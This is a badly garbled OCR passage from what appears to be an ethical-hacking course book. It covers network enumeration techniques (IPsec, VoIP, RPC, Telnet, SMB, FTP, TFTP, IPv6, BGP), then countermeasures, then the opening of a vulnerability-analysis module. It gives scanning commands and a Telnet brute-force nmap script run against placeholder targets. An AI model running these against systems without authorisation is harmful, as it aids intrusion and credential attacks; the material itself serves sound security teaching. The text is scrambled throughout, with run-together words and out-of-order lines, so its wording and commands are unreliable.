aS A,AMAA,andCNAME,
It
filesof a targetdomain.
alsoperforms records
such
users i n enumerating
zone enumeration to obtainDNSrecord
NSEC

shown in the screenshot,attackersuse the following

‘As query to perform
zone
a targetdomaincertifiedhacker.com:
against
‘enumeration
dnsrecon -d <target domain> -2

Prerscrcsccy Obtainedrecordfile ‘A’

Figure4.29
Screenshot displaying
ofDNSRecon resultsonthetarget
domain

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

[NetBIOS
Enumeration

LDAPEnumeration

Other Enumeration Techniques

IPsec,
Thissection discusses Unix/Linux
VoIP,RPC, user, Telnet,
SSHuser, FTP,
TFTP,
SMB,IPV6,
andBGPenumeration.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 IPsecEnumeration

ExchargsRE)
‘apne communion
eto
VPen
sear Between
pote
Most Psecbased
‘Associaton
(SAK) a
andKey
part
Internet
Security
VPNsute

Management
Protocol
oFRE,toestab, neat,
Imo, anddeleteSecurityAsooaton SA and

IPsecEnumeration
the most commonly
IPseciis
andhost-to-gateway
employing
implemented
(remote access)
various components
technology
enterprise
for both
gateway-to-gate
(LAN-to-L
VPN solutions.IPsecprovides
suchas Encapsulating SecurityPayload
datasecurity
(ESP),
by
Authentication
Header (AH),andInternet KeyExchange
(IKE) VPNendpoints.
to secure communication between

Most IPsec-basedVPNsuse the Internet Security

AssociationKeyManagement Protocol
(ISAKMP),
cryptographic of
a part IKE,to establish,

inaVPN
keys
modify,
negotiate,
environment.
anddeleteSecurity (SA)
Associations and

can perform
‘Attackers simple
direct scanningfor ISAKMPat UDPport500with toolssuchas
to acquireinformationrelatedto the presenceof a VPNgateway.
Nmap

ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing c an be usedto perform
command scanforchecking
an Nmap the statusofISAKMP
over

#
port
500:
nmap -sU -p 500 <target IP address>

Figure4.30:
Screenshot
displaying
an Nmapscan over portS00
fr ISAKMP
Attackerscan probe further using fingerprinting toolssuchas ike-scanto enumerate sensitive
information, including the encryption and hashing algorithm, authenticationtype, key
an ISAKMP of
distributionalgorithm,
header
andSALifeDuration. in thistype scan,specially
are sentto the targetgateway, andthe responses
craftedIKEpackets
are recorded.
with

Thecommand discovery
following
with is usedforinitial IPsec
# ike-scan -M <target gatewayIP address>
VPN ike-scantool

ical andCountermensores
Mackin ©by E-Comel
Copyright
ike-scan
Source:https://github.com
IKEhostsandcan fingerprint
ike-scandiscovers themusing the retransmission backoffpattern.
can perform
ike-scan thefollowing
functions.
Discovery:ThehostsrunningIKEin a givenIPrangecan bedeterminedbydisplaying the
hoststhat respond to the IKErequestssent byike-scan.
Fingerprinting:
TheIKEimplementation usedbythe hostscan be determined, and i n
some cases,the version of thesoftwarethey are runningcan bedetermined.
Thisis done
i n two ways:UDP backofffingerprinting,
whichinvolvesrecording
the times of arrivalof
the IKE responsepackets from the target hosts and comparingthe observed
retransmission backoffpattern knownpatterns,
against and Vendor ID fingerprinting,
whichcomparesVendorID payloads from the VPNservers againstknownVendorID
patterns.
Transformenumeration: Thetransformattributessupportedbythe VPNserver for IKE
1
phase(e.g.,
encryptionalgorithm andhashalgorithm)
Userenumeration: For some VPNsystems,
can bedetermined
validVPNusernames can bediscovered.
Pre-sharedkeycracking: or brute-forcepassword
Offline dictionary crackingcan be
performed for IKEAggressive
Modewith pre-shared keyauthentication.Thisuses ike-
scan to obtainthe hashandother parametersas well as psk-crack,
whichis a partof the
ike-scan package,to perform
the cracking,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 VoIPEnumeration

VoIPEnumeration
VolPis an advancedtechnology that hasreplaced the conventionalpublic switchedtelephone
network(PSTN)
and
i n both corporatehomeenvironments. VolP uses internet infrastructure
establishconnectionsfor voice calls;dataare alsotransmittedon the same network.However,
VoIP is vulnerableto TCP/IP
to

is one of the protocols

attackvectors. SessionInitiation Protocol(SIP)
UsedbyVoIPfor performing voice calls,video calls,etc. over an IP network.ThisSIPservice
generally uses UDP/TCP 2000,2001,5050,and5061.
ports
Attackersu se Svmap and Metasploit tools to perform VoIP enumeration. Through VoIP
enumeration,attackersc an gather
branchexchange (PBX)
software(softphones)
systems,
sensitive informationsuchas
and User-Agent
or VoIP phones.
IP addresses VoIP
gateway/servers,
IP-private
and user extensions of client
Thisinformationcan be used to launchvarious VoIP
session hijacking,
attackssuchas DoS attacks, callerID spoofing,
eavesdropping, spam over
Internettelephony
(SPIT),
andVolPphishing(Vishing).
+
svmap
Source:httpsy//oithub.com
‘Svmap
is an open-sourcescanner that identifiesSIPdevices
and PBXservers on a target
network.It can be helpful
for system administrators whenusedas a networkinventory
tool
‘Attackers to perform
use Svmap thefollowing:
© Identify
SIPdevicesandPBXservers on defaultandnon-defaultports
©. Scanlarge
rangesof networks

ical andCountermensores
Mackin ©by E-Comel
Copyright
 © portsforan SIPservice on that hostor multiple
Scanone hoston different hostson
multiple
ports,
>
allthe phones
Ring
Belowscreenshot
on a networksimultaneously

showsa n example
using
the INVITEmethod
fortheenumeration of SIPdevicedetailsusingthe
‘Svmap
tool through
the following
command:
# svmap <target network range>

use Metasploit’s
Attackers SIPUsername
emap
to details
432: Screenshotdisplaying scanforenumerating
Figure SIP

of
Enumerator scan numeric usernames/extensions
VolPphones. showsan example
Belowscreenshot SIPusing Metasploit.
for enumerating

Figure displaying
433:Screenshot exploit
Metasploit fr SIPenumeration

ical andCountermensores
Mackin ©by E-Comel
Copyright
 RPCEnumeration
'@
femote
Provedure
atrbuted
Gherferver
protons
ommontatem
CalRC lows dents anderen o

RPCEnumeration
The remote procedure call (RPC)is a technologyusedfor creating distributedclient/server
programs. RPCallowsclientsandservers to communicate i n distributed
client/server
programs.
It is an inter-processcommunication mechanism, which enablesdata exchange between
differentprocesses.In general, RPC consistsof components suchas a client,a server, an
mapper,
endpoint,
clientserver
Theportmapper
stub,
anendpoint
withdependen
a stub,
anda along various
service listenson TCPandUDPport111to detectthe endpoints and present
clients,
details
to identifyRPC
along
services.
with

othersecurity
endpoints
enables
of listening

establishments, thisportmapper
Enumerating RPC
any vulnerableservices on theseservice ports.In networksprotected
is oftenfiltered.Therefore,
attackers
byfirewallsand
attackersscan wide
portrangesto identify RPC services that are open to directattack.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 use the following
Attackers Nmap to identify
s can commands the RPCservice runningon the
network:
# nmap ~sR <target IP/network>
# nmap -T4 -A <target IP/network>

[THeseT] pour
Series] Posts Top, Ho D i Sms
oe
eater
c
TT on ener

»

Goon Sronta 4:3 (APC1005)

434:
Additionally,
Figure
attackers
Sceenshotdisplaying

usetoolssuch
as NetScanTools
Scan result fr RPCenumeration
an Nmap

Proto capture theRPCinformation ofthe

Pro RPCInfo tool helps
targetnetwork.The NetScanTools attackersdetect and access the
portmapper
that
typically
runs
on
daemon/service port111 of Unixor Linux machines,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 File Edt
- Version
demoNetScanTools®
ProDemo
Accesubilty
View IG
Build7-3-2019
Help
bared
on version 1.863

Welcome Click
Buy
Now! hereto Manual RPCnfo.
Toole=“nix
=

cuey
onc
RPC
services
oncompute.
BT

a rx
ManusToot(a)
or v Adtese
TexgetHotname
T.10.10.19

RPCPort

Figure4.35:
Screenshot NetScanTools
displaying Protal for RPC
enumeration

8
Module 462
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 Unix/Linux UserEnumeration

|
Unix/Linux User Enumeration
importantstepsfor enumeration is to perform
One of the Unix/Linux user enumeration

Unix/Linux
host
name, asession,
user enumeration provides

time
each
andstart dateand
listof users along
of
with detailssuchas the username,

following
The utilitiescan beusedto perform
command-line Unix/Linux
user enumeration.
=
rusers
rusers displays
a listof userswho are loggedin to remote machines
or machines
on the
local network. It displaysan output similar to the who command, but for the
hosts/systemson the localnetwork.Its syntax
i s as follows:
fusr/bin/rusers (-a] [-1] [-ul -h] -i] [Host
Theoptions
a re as follows.
© -a: Givesa reportfor a machineeven if no users are logged
in

©

-l: Gives
by
alphabetically
-h:Sorts

alongerhost
name
listing
to
the
who similar command
©

>
-u:
42Sorts
by
idle
time
of
Sortsbythe number users

rwho
who displaysa listof users who are logged
i n to hostso n the localnetwork.Its outputis

to
similar that ofthe whocommandandcontains information aboutthe username, host
name, and start date and time of eachsession for all machines
runningthe rwhodaemon.Its syntaxi s asfollows:
o n the localnetwork

ical andCountermensores
Mackin ©by E-Comel
Copyright
who [ -a]
It hasthefollowing
option.
-a: Includesall users;withoutthis flag,
users whosesessionsare idleforan houror
more are not includedi n the report
finger
finger
displays
information
aboutsystem login
userssuchas theuser’sname, realname,
terminalname,idletime,login
time,officelocation,
andofficephone
numbers.Its syntax
is asfollows:
finger [-1] [-m] [-p] [-s] [user ...][user@host
Theoptionsare as follows.
© -5: Displays
theuser’sloginname, real name, terminalname, idletime, login
time,
officelocation,andofficephone
number

a
-I: Produces multi-lineformat displaying
homedirectory,
optionas well as the user’s homephoneof
all the informationdescribedfor the -s
number, loginshell,mail
the
status,andthe contentsof files “plan,―
the user'shomedirectory
“.pgpkey,―
*.project,―
and
*
forward―
from

-p: Preventsthe -1optionof fingerfrom displaying

the contents of the “plan
“project,―
and".pgpkey’
files.
-m: Prevents of usernames.
the matching

Figure4.36:
displaying
Screenshot
ofthe user
theexecution fingercommand for enumeration

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Telnetand SMBEnumeration

Telnet Enumeration
Telnetis a networkterminalprotocol
that allowsusers to access remote computersor servers
provides
over the Internet.Thisprotocol two-way interactive communication forcomputers on

LANs
login theremote system
to onprivileges
and the Internet.Dependingthe
assigneduseto
to accessspecific
to the users, theycan
files,services,data,
etc.
Telnet

Attackers perform portscanningto gather information openportsandserviceson the

regarding
targetserver. If the Telnetportis foundto be open, attackerscan learnaboutthe information
beingshared,including hardwareand softwareinformation of the target.Byusing this
information,
attackerscan exploit
their specific
vulnerabilitiesandperform
a brute-forceattack
to gainunauthorized accessto the targetsystem.
Attackerscan use the Nmaptoolto perform
simple directscanningfor Telnetport23

‘As
shown the following
i n the screenshot,
by to
Nmapcommandis used attackers enumerate the
Telnetservice runningon the targetsystem:
# nmap ~p 23 <target domain>

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Indicatesthat port23 i blockedbya firewall
other network obstacle
‘orsome

Figure437:Screenshot
Attackerscan further use the following
displaying
of Nmap a Telnet
enumeration result

scriptto enumerate informationfromremote Microsoft

TelnetserviceswithNewTechnology LANManager (NTLM) authenticationenabled:
# nmap ~p 23 --script telnet-ntim-info <target IP>
Oncetheinformation the attackerscan use the following
aboutthe targetserver is obtained,
scriptto perform
a brute-forceattackagainst
theTelnetserver:
# nmap -p 23 -script telnet-brute.nse ~script-args
userdb=/root/Desktop/user.
txt, passdb=/root/Desktop/pass.txt
<target
IP>
SMB Enumeration
Server Message Block(SMB) protocol
is a transport that is generallyusedbyWindowssystems
for
providing
shared
access
printers,well
remote
access
to files,
SMBruns directly
services. Bydefault,
andserialports
on TCPport
as as to Windows
445 or via the NetBIOSAPIon UDPports137
and138andTCPports137and 139.Byusingthe SMBservice,u serscan accessfilesandother
datastoredat a remote server. TheSMBservice alsoallowsapplication users to read,
write,and
modifythe fileson the remote server. A networkrunningthisservice is highlyvulnerableto SMB
enumeration, whichprovides a goodamount of informationaboutthe target.
In SMBenumeration,
attackers
generally
perform
banner grabbing to obtaininformationsuchas
OSdetailsand versions of services running.Byusingthis information,
various attackssuchas SMBrelay
attackerscan perform
attacksandbrute-forceattacks.Attackerscan also use SMB
enumeration tools suchas Nmap, SMBMap, enumdlinux, nullinux,and NetScanTool Pro to
perform a directedscan on the SMBservice runningon port 445.

showni n thescreenshot,
‘As use thefollowing
attackers Nmapcommand to enumerate theSMB
service runningon the targetIPaddress:
# nmap -p 445 -A <target IP>
In the abovecommand,the option~p specifies
is usedfor OSdetection,
a portto scan (445in this
case),
andoption~A
scriptscanning,andtraceroute information.
version detection,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 “|
Openport445

SMBdetails

438:Screenshot
Figure of Nmap SMB
performing enumeration

TheSTATEof PORT445/tep is OPEN, whichindicatesthat port445is open andthat the SMB

service is running.Byusingthiscommand,
attackerscan alsoobtaindetailson the OSand
traceroute of the specified
target.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 FIP and TFTPEnumeration

mv oh ey nn oe
= See)

FTPEnumeration

The
Transfer
Protocol
(FTP)
File
to
transfer
plaintext, default
dataare transferred
is used
betweena senderandreceiver
suchas usernamesandpasswords to attackers.
files over TCP,
in
andits ports 21.In FTP,
exposingcriticalinformation
FTPoffersneithera secure networkenvironment
do
nor secureuser authentication.
a network.Thisprovides
Individuals not needauthentication
an easymethodfor attackers
to accessan FTPserver i n
to accessnetworkresources.
Theimplementation of FTPi n an organization's
networkmakesthe dataaccessible to external
sources. Attackerscan scan andenumerate open port21 runningFTPservices andfurtheru se
this informationto launchvarious attackssuchas FTPbounce, FTPbrute force,and packet
sniffing,
Asshown in thescreenshot, the following
the FTPservice runningon the target
Nmap
domain:
command
by to
i s used theattackers enumerate

# nmap -p 21 <target domain>

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Indicatesthat port 21is blockedbya
firewallor some othernetworkobstacle

Figure439:Screenshot
Attackersalsouse Metasploit
of Nmap
a
dslayingFPenumeratione st
to enumerate FTPservices runningo n remote hosts.Thefollowing
commands can beusedto detecttheFTPversion ofthe targetserver:
use
auxiliary/scanner/ftp/ftp_version
msf
msf
auxiliary
(scanner/ftp/ftp_version)
(scanner/ftp/ftp_version)
auxiliary
> set RHOSTS <target IP>
> exploit
‘TFTP
Enumeration
TheTrivialFileTransferProtocol(TFTP)is a simplified andis usedfor transferring
version of FTP
filesbetweennetworkdevices.Bydefault, TFTPservers listenon UDP port69. Thisprotocolis
usedwhendirectory visibility therefore,
anduser authenticationa re not required; It provides
no
securityfeatures.
To perform TFTPenumeration,attackerscan use toolssuchas PortQry and Nmap to extract,
informationsuchas runningTETPservices and filesstoredon a remote server. Byusingthe
enumeratedinformation, attackerscan further gain unauthorizedaccess to the targetsystem,
stealimportantfiles,and upload maliciousscriptsto launchfurtherattacks.Furthermore, this
informationenablesattackersto perform
reflection
attacks,andDDoSattacks.
various
attacks
suchas DNSamplification attacks,TFTP

=
Portary
Source:https://www.microsoft.com
The PortOry utilityreports
the portstatus of TCP and UDP portson a selectedtarget.
Attackerscan use the PortQrytool to performTFTPenumeration. Thisutilityreports
the
of
portstatustarget
a or
TCPandUDPportson local remotecomputer.
In the
PortQry
on openporttool,
69. specify
by shown
As targeta on
theattackersc an
screenshot,
attackers
in the
the
the to scan for runningTFTPservice
perform TFTPenumeration
targetdomain
settingthePorts to query: valueto 69 andProtocol to UDP.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ar

440: Screenshotofthe
Figure
Poetry
tool a TFP
dsplaying seanresult

8
Module 470
Page tical andCountermensores
Making by Comet
Copyright©
 Attackerscan alsouse the PortQry
command-line
utilityto perform
TFTPenumeration
using
the command:
portary
following
-n <target domain> -e
69 -p udp

at:
Figure Screenshotofthe Portry commandlineult showing
a TFTP
scan result
+
Nmap
Source:https://nmap.org
can use the Nmap
‘Attackers tool to perform
simple
directscanningfor TFTP
port69.As
showni n the screenshot,
theTETP
thefollowing
service runningon the target
Nmapcommand
by to
is used attackers enumerate

domain:
# nmap -p 69 <target domain>

some
ather by
a
obstacle
cor
port69sblocked rewl
Indicates thatthe
network

gure
442:of
NmapaTFTP
Screenshot command displaying
scan

ical
result

andCountermensores
Mackin ©by E-Comel
Copyright
 IPv6Enumeration

IPvé
Enumeration
InternetProtocolversion 6 (IPv6) is an addressing protocol that identifiescomputer systems,
includinglocationinformation, andassistsi n routingtrafficfromone system to another
system
acrossa network.Its an advanced version of IPv4and,therefore, supports a greaternumberof
hostsascompared
Attackers perform
to IPv4. It was designed to overcome the problem
address
exhaustio
of IPv4
IPv6enumeration on targethoststo obtaintheirIPV6addresses andfurther
scan the enumeratedIPaddresses problems
to detectvarious security suchas access to routing
structure,
sensitive
content, using
of
exposure andusers’accesscontrol
iss. By
attackerscan launchvarious attackssuchas SYNflood attacks,
DDoSattacks.
thisinformation,
ONSamplification
Attackerscan scan andenumerate the IPv6address
attacks,
of a targetmachine
and
i n the

network
=
various Hackit.
byusing
Enyx
tools suchas Enyx
andIPv6

Source:https://aithub.com

an
{Asof tool
that
fetches
the
IPv6
address
Enyxiisenumeration

the
following SNMP.
shownin the screenshot,
attackersuse
through
of a machine
command to enumerate the

community by
a setting
version
IPv6 addresstarget machine(10.10.10.20) the SNMP to 2e
and stringto pubLie:
Pythonenyx.py 2c public <target IP>

ical andCountermensores
Mackin ©by E-Comel
Copyright
IPv6Hackit
Source:http://ipvéhackit.sourceforge.net
Hackitis a scanningtool that provides
a list of active IPv6hosts.It can perform
TCPport
scanningandidentify AAAAIPv6hostrecords.
showni n the screenshot,
‘As attackerscan specify the targetmachineand run a scan to
the IPv6 information.
‘enumerate

444:
Figure Sceenshotdisplaying
the Pus Hackl

ical
tool

andCountermensores ©by E-Comel

Mackin Copyright
 BGP Enumeration

BGPEnumeration
The BorderGateway Protocol(BGP) is a routingprotocol used to exchange routingand
reachability
information betweendifferentautonomous systems (AS) on the Internet.Because
is usedto connect one ASto other ASs,
this protocol itis alsocalledexternalBGP(eBGP). BGP
findstheshortest
TCPsessionon port179, to
pathto routetrafficfromone IP address anotherefficiently. BGPcreates its

Attackersperform
discover
BGPenumeration on the targetusing toolssuchas Nmap
the IPv4prefixes
andBGPToolkit
bythe ASnumberandthe routingpathfollowedbythe
indicated
target.Attackersuse thisinformationto launchvarious attacksagainst
the target,suchas man-
to
in-the-middleattacks,BGPhijackingattacks,andDoSattacks.
Asshownin the screenshot, attackersuse the following
Nmap
commandto enumerate BGP
running o n the target
system
# nmap -p 179 <target IP>

445: Screnshat
Figure of Nmap
di ing 8G?enumerationresut

ical andCountermensores
Mackin ©by E-Comel
Copyright
Asinthe
shown
use
forto
Toolkitperforrn
attackers BGP
screenshot,
domain.Thisonlinetool can beusedto search the target
DNSinformation, websiteinformation, IP information,
BGP
the
enumerationo n target
domainandobtaindetailssuchas
ASinformation, andwhoisinformation,
Basedo n the identifiedASs,
attackerscan further enumerate detailssuchas IPv4prefixes,
BGP
graphs,
routing andIPv4peers.

WARRING
(=e
PaaeTAL

a
my TONNE
AW haatpi

Figure446:
Screenshot
of86PToolkit

ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow

[NetBIOS
Enumeration

LDAPEnumeration ‘Enumeration
Countermeasures

Enumeration Countermeasures

SNMP DNs

thedeft commonty
‘hone sng names

Donotmiscontgure
SNMPservice wthead

ical andCountermensores
Mackin ©by E-Comel
Copyright
 EnumerationCountermeasures(Cont'd)

tm

Enumeration Countermeasures (Cont'd)

NFS FIP

Implement
parison
rer eadwe must Inlet
sere
(SFR
wnSS
or ves

Enumeration Countermeasures
Thusfar,we have describedenumeration techniques and tools used to extract valuable
Informationfromtargets.Next, we discusscountermeasures that can preventattackersfrom
enumerating sensitive informationfrom a networkor host.Thissection focuses
o n methodsto
avoidinformationleakage throughSNMP, DNS,SMTP, LDAP,SMB,NFS, andFTPenumeration.

ical andCountermensores
Mackin ©by E-Comel
Copyright
SNMPEnumerationCountermeasures
+

+
Remove

Ifturning
SNMP offSNMP
service,
the SNMPagentor turn

option, community
off is not an
the
then change
thedefault stringnames
+
Upgrade
to SNMP3, passwords
whichencrypts andmessages:
Implement
theGroup
Policy optioncalled“Additional
security restrictions foranonymous
connections.―
Ensurethat the access to null session pipes, null session and IPsecfiltering
shares, is
restricted.

access
Block
port
TCP/UDP
161.
to
Donot installthe management
andmonitoring unlessrequired.
Windowscomponent
‘=

=
Encrypt
Donot
or
using
authenticate
SNMP
misconfigure the
IPsec.
servicewithread-writeauthorization.
DNSEnumeration
Countermeasures
Disable DNSzone transfersto untrustedhosts.
‘=
Ensurethat the privatehostsandtheir IP addresses are not published
i n the DNSzone
filesofthepublicDNSserver.
UsepremiumDNSregistration services that hide sensitive information suchas host
fromthe public.
information(HINFO)
Usestandard
networkadmincontactsfor DNSregistrations
to avoidsocialengineering
attacks
Prune DNSzone filesto revealing
prevent unnecessaryinformation,
Enumeration
‘SMTP Countermeasures
SMTPservers shouldbeconfigured
in the following
manner.
+
Ignore
emailmessages
to unknownrecipients.
+
Excludesensitive informationon mailservers andlocalhostsi n mailresponses
*
Disablethe open relay
feature.
+
of accepted
Limit thenumber preventbrute-force
connectionsfroma source to attacks.
‘Disable
EXPN, VRFY,andRCPTTOcommandsor restrict themto authenticusers
+
Ignore byconfiguring
emailsto unknownrecipients SMTPservers,
LDAPEnumeration
Countermeasures
By default,
LDAPtraffic is transmittedunsecured;therefore,
use Secure Sockets
Layer
(SSL) technology
or STARTTLS the traffic.
to encrypt
Selecta username differentfromtheemailaddressandenableaccount lockout,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
byusingsoftware
Restrictaccessto ActiveDirectory suchas Citrix.
=
to limit accessto legitimate
UseNTLMor any basicauthenticationmechanism users.
SMBEnumeration
Countermeasures
Common sharing services or otherunusedservices mayprovide doorways for attackersto break
into a network'ssecurity, A networkrunningSMBis at a high riskofenumeration.Sinceweband
DNSservers do not require this protocol,
it is advisableto disableit o n them. TheSMBprotocol
can bedisabledbydisabling ClientforMicrosoft
the properties NetworksandFileandPrinter
Sharing
for MicrosoftNetworks i n Network and Dial-up Connections.On servers that are
accessible fromtheInternet, alsoknownas bastionhosts,SMBcan bedisabledbydisabling the
same two properties of the TCP/IPproperties
dialogbox.Anothermethodof disabling theSMB
protocol on bastion
hosts,without explicitly
disabling the portsusedbytheSMB
it, is byblocking
service. Theseare TCPports139and445,
Becausedisabling SMBservices is not always a feasibleoption,other countermeasures against
SMBenumeration maybe required. WindowsRegistry can be configured to limit anonymous
access fromthe Internet to a specified
set of files.Thesefilesandfoldersare specified i n the
Networkaccess: Named
settings anonymously
pipesthat can beaccessed andNetworkaccess:
Sharesthat can be accessedanonymously.
This configuration
involves addingthe
RestrictNullSessAccess key:
to the registry
parameter
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanSe
The RestrictNullSessAccess parametertakes binaryvalues,with 1 denoting
enabledand 0
denoting
disabled.
Settingto
1or
to the filesspecifiedenabled the anonymous
thisparameter
i n the Networkaccesssettings.
of
restricts access users

following
The are defending
additionalcountermeasuresfor SMBenumeration,
against
=

Windows
Firewall
system.similar
Ensurethat
protection
endpoint or are enabled
systems on the

patches
Installthe latestsecurity for Windowsandthird-party
software.
Implementa proper authenticationmechanismwith a strongpassword
policy.
Implementstrongpermissions to keep
the storedinformationsafe.
Perform
a regularaudit of systemlogs.
=
Performactive system to monitor the systems
monitoring for anymalicious
incident.
NFSEnumeration
Countermeasures
+
Implement proper permissions (read/write must be restrictedto specific
users)
in
exportedfile systems,
Implement firewallrulesto blockNFSport2049,
Ensurethe proper configuration
‘=
of filessuchas /etc/smb conf,/etc/exports,and
etc/hosts. allow to protectthedatastoredin the server.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
to accessthesystem
Logthe requests fileson theNFSserver.
=
Keep the reot_squash optionin /etc/exports file turnedONso that no requests
madeas root on theclientare trusted
‘=
Implement through
NFStunneling theNFStrafficover the network.
SSHto encrypt
FTPEnumerationCountermeasures
=
Implement
secure FTP(SFTP,
whichuses SSH) secure (FTPS,
or FTP whichuses SSL)
to
theFTPtrafficover thenetwork.
encrypt
Implement
strongpasswords or a certification-based
authenticationpolicy.
Ensurethatthe unrestricteduploading
of fileso n the FTPserver is not allowed.

Disable
FTP isnot monitor
regularly. FTP
anonymous accounts.
f this possible, anonymous
accounts

RestrictaccessbyIPor domainname to theFTPserver.

Configure FTPaccounts withthe helpof access control
access controlson authenticated
lists(ACLs).
attemptsandtime.
Restrictlogin
Configure
filtering
rulesfor theFTPservices.
UseSSL/FTPS
for authenticatedFTPaccounts.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Module Summary

1 mod,
inthis we have

Howattackers
perf enumeration
sing diferenttechniques SNMP,
(NetBIOS,
16, t gather
andGP enumeration) more Information
about2a

inthe
next module,
we wildass in detailh ow
nd pentesters,perform
vulnerability
anasto attackers,
entias 6
secur
well ethicalhackers
loopholesinthe

Module Summary
In thismodule,we discussed
theenumeration concepts alongwiththe techniques,
services,and
ports used for enumeration. We have also discussedhow attackersperformdifferent
enumeration techniques (NetBIOS,
SNMP,LDAP, NTP,NFS,SMTP,DNS,IPsec, VoIP,RPC,
Linux/Unix,Telnet,
FTP,TETP,SMB,IPv6,andBGPenumeration) to gatherinformationaboutthe
target.Thismoduleendedwitha detaileddiscussion on thecountermeasuresthatorganizations
can adoptto defendagainst
enumeration activities.
In the next module, i n detailhow attackers,
we will discuss as well as ethicalhackersand pen
testers,perform
vulnerability
analysisto identify loopholes
security in the targetorganization’s
network,communication infrastructure,
andendsystems.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 |
Certified Ethical Hacker

—< Module05:
Vulnerability
Analysis
 Module Objectives

‘overview
of VunrabityManagement

Understanding
Valou yes ofVulnerableandVerity
Asetsment
Li e Cyle(Vunrabity Phases)

AssesmentT echniques

Module Objectives
In today’s
world,organizations depend heavilyon informationtechnology
for protecting
vital
information.
Thisinformation with areas of finance,
i s associated researchand development,
personnel,
legality, Vulnerability
and security. assessmentsscan networksfor knownsecurity
weaknesses.
Attackers performvulnerability analysis to identifysecurityloopholes
i n the target
organization’snetwork, communicationinfrastructure, andend systems.The identified
vulnerabilitiesare usedbyattackersto furtherexploit
that targetnetwork.
Vulnerabilityassessmentplays a major role i n providing
security to any organization's resources
and infrastructure from various internalandexternalthreats.To secure a network, an
administratorneedsto perform patchmanagement, install proper antivirus software, check
configurations,solveknownissuesi n third-party applications,andtroubleshoot hardware with
defaultconfigurations.
All
theseactivities
together
a constitutevulnerability
Thismodulestarts with an introductionto vulnerability assessmentconcepts.
assessment,
It alsodiscusses
the various vulnerability
scoringsystems, vulnerability
databases, vulnerability
management life
cycle,and various approaches and tools used to perform vulnerability assessments.This
modulewill provide knowledge aboutthetoolsandtechniques usedbyattackersto perform a
quality vulnerability
analysis.It concludeswith an analysis of the vulnerability assessment
reportsthathelp
an ethical
hacker
to fix the identified
vulnerabilities.

ical andCountermensores
Mackin ©by E-Comel
Copyright
At theendof thismodule,
youwill beableto:
© Understand research,
vulnerability vulnerability andvulnerability
assessment, scoring
systems
thevulnerability
Describe management lifecycle(vulnerability
assessmentphases)
Understandvarious typesof vulnerabilitiesandvulnerability
assessmenttechniques
differentapproaches
Understand to vulnerability
assessmentsolutions
Describe of good
differentcharacteristics vulnerability
assessmentsolutions

Explain typesof vulnerability

different toolsandthecriteria for choosing
assessment
them
Usevarious vulnerability
assessmenttools
Generate andanalyze
vulnerability
assessmentreports,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

Valnerabilty Concepts
Assessment

aseetment
Typee
Classification
‘Vulnerability and

Assessment
Reports
‘Vulnerability

Vulnerability Concepts
Assessment
Thereare generallytwo main causesforvulnerablesystems in a network, softwareor hardware
misconfigurationand poor programming practices. Attackersexploit thesevulnerabilitiesto
perform
vulnerability
assessment,
vulnerability
assessmentlifecycle.
on
various typesofattacks organizational
vulnerability
resources. Thissection givesan overview of
scoring systems, vulnerabilitydatabases, and the

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Research
Vulnerability
(a. T heproces of analying

an
operating
thatwil expore
“©
Vuinerabltiesare and discover
vulnerable
protocol,services, andconfiguration

appletons
explo,
sytem ts
classedbased
to
level(low,
on severity
to
aac, or misuse

or igh)andexplot
medium,
and design

ange(eal or
flaws

remote)

Anadministrator needsvulnerability
research:

trends,
threat,attacksurfaces,
andtechniques
attack vectors
Tegather
information oad intheprevention
af

se
BD ciscoverw eknessesin
aplaton
Bitar
te
ad alertnetwork
before
a network
ak
0Sa
“know
how
om
a to recover networkstack

‘Vulnerability
Research
Vulnerability
researchis the processof analyzing protocols,services,and configurations
to
discoverthe vulnerabilitiesand design flawsthat will expose an operating systemand its
applications
‘An
to
exploit,attack, or misuse.
administratorneedsvulnerability research
+
To gather informationabout securitytrends, newly discovered threats,
attacksurfaces,
attackvectors andtechniques
To find weaknesses i n the OSand applications and alert the networkadministrator
beforea network attack
=
Tounderstandinformation
that helps problems
preventsecurity
=
Toknowhow to recover froma networkattack
ethicalhackerneedsto keepup with the most recently
‘An discoveredvulnerabilitiesand
exploits
to stayone stepahead through
ofattackers vulnerability whichincludes:
research,
faultsand weaknesses
Discoveringthe systemdesign that mightallow attackersto
compromise a system
updated
Staying about new products and technologies
and reading news related to

current
exploits
Checking
underground hacking web sites(DeepandDarkwebsites) for newlydiscovered
vulnerabilities
andexploits
Checkingnewlyreleased alerts regarding relevant innovations and product
improvements for securitysystems

ical andCountermensores
Mackin ©by E-Comel
Copyright
Securityexpertsandvulnerability
scannersclassify
vulnerabilities
by:
=
Severitylevel(low,medium, or high)
=
range (localor remote)
Exploit
Ethicalhackersneedto conductintense researchwith the helpof informationacquired
i n the
footprinting
andscanning phases to findvulnerabilities,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Resourcesfor Vulnerability
Research

Dy,wees semumerine

a « eText Maenine
>= ae

Resourcesfor Vulnerability
Research
Thefollowing
+
are some
of
the onlinewebsitesusedto perform
MicrosoftVulnerability (https://www.
(MSVR)
Research
vulnerability
microsoft.com)
research:

*
DarkReading(https://www.darkreading.com)
SecurityTracker(https://securitytracker.com)
+
TrendMicro(hetps://www.trendmicro.com)
Security
Magazine (https://www.securitymagazine.com)
PenTestMagazine (https://pentestmag.com)
SCMagazine(https://www.scmagazine.com)
Exploit
Database (https://www.exploit-db.com)
(httes://www.securityfocus.com)
SecurityFocus
